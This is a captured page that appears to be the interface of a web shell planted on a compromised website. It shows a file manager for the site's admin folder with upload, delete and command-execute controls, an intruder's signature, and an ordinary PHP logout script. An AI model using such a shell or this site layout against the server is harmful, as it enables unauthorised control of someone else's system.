home
/
aioutajg
/
playpauseonline.com
/
admin
/
Go to Home Directory
+
Upload
Create File
root@0UT1S:~$
Execute
By Order of Mr.0UT1S
[DIR] ..
N/A
[DIR] ckeditor
N/A
[DIR] css
N/A
[DIR] uploads
N/A
config.php
1.02 KB
Rename
Delete
error_log
4.08 KB
Rename
Delete
index.php
2.41 KB
Rename
Delete
install.php
1.07 KB
Rename
Delete
login.php
1.99 KB
Rename
Delete
logout.php
812 bytes
Rename
Delete
post.php
13.47 KB
Rename
Delete
upload_image.php
1019 bytes
Rename
Delete
<?php // Admin Logout Script require_once __DIR__ . '/config.php'; // Use admin config for session settings // Start session if not active if (session_status() === PHP_SESSION_NONE) { session_start(); } // Clear session data $_SESSION = array(); // Delete session cookie if (ini_get("session.use_cookies")) { $params = session_get_cookie_params(); setcookie( session_name(), '', time() - 42000, $params["path"], $params["domain"], $params["secure"], $params["httponly"] ); } // Destroy session session_destroy(); // Redirect with security headers header("Location: " . SITE_URL); header("Cache-Control: no-store, no-cache, must-revalidate"); header("Pragma: no-cache"); header("Expires: 0"); exit; ?>
Save